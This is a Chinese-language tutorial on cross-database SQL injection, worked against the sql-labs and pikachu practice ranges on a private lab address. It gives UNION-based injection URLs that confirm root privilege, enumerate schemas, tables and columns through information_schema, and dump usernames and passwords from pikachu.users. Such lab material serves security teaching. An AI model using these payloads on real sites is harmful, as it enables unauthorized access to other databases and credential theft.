SQL注入—跨库注入

没有人挡得住,你疯狂的努力进取。你可以不够强大,但你不能没有梦想。如果你没有梦想,你只能为别人的梦想打工筑路。

导读:本篇文章讲解 SQL注入—跨库注入,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

1.SQL注入—跨库注入

1.1.前言

  该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。
  SQL注入基础原理与案例:参考文章

1.2.跨库注入介绍

  跨库注入首先需要明确注入点的权限,若不是root权限或者管理员权限,那么无法执行跨库注入,只有高权限才能执行跨库注入。
  简单来说,跨库注入就是在同一个数据库管理系统中,在某一个点存在SQL注入,而通过这点查询到,该权限为Root权限,那么就可以使用这种方式去操作同数据库下的其它网站数据库,这样就实现的跨库注入。

2.跨库注入

2.1.跨库注入准备

  这里我们采用联合注入方式进行演示,其它的注入方式都是一样的操作,前提是需要拥有管理员权限。
  同时采用sql-labs靶场来演示,sql-labs靶场安装可以参考以下链接。
  sql-labs靶场安装:靶场安装

2.2.跨库注入流程

  这里前期寻找注入点什么时候都不说了,直接判断并进行测试。

2.2.1.判断是否为管理员权限

  可以看到这里是为root权限,而且当前网站的数据库是security,那么我们该如何进行跨库注入,不过这里我们已经获取到的是管理员权限,那么我们就已经完成了前置条件了。

命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,user(),database()--+

在这里插入图片描述

2.2.2.获取数据库下所有库

  这里我们就使用information_schema.schemata获取所有的数据库名,由于在Mysql>5.0版本的时候都会将所有库、所有表、所有列都会放在一张统一的表中,具体的原因还需要去了解数据库,这里我也过多的解释,我们看如何使用即可。

命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+

在这里插入图片描述

2.2.3.获取pikachu下的表

  这里我们可以看到,获取到了pikachu数据库,那么我们就读取pikachu数据库下的表。
  需要注意并不是读sql-labs的数据库哦,sql-labs数据库名叫security,而pikachu数据库是pikachu靶场的数据库哦,来实现跨库注入。

命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'--+

在这里插入图片描述

2.2.4.获取pikachu表中列

  这里我们获取pikachu中的users表走的列。

命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'--+

在这里插入图片描述

2.2.5.获取pikachu列中数据

  这里需要注意,先写数据库名,如何在写数据库表名,例如:数据库名.数据库表名。

命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users--+

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/133395.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!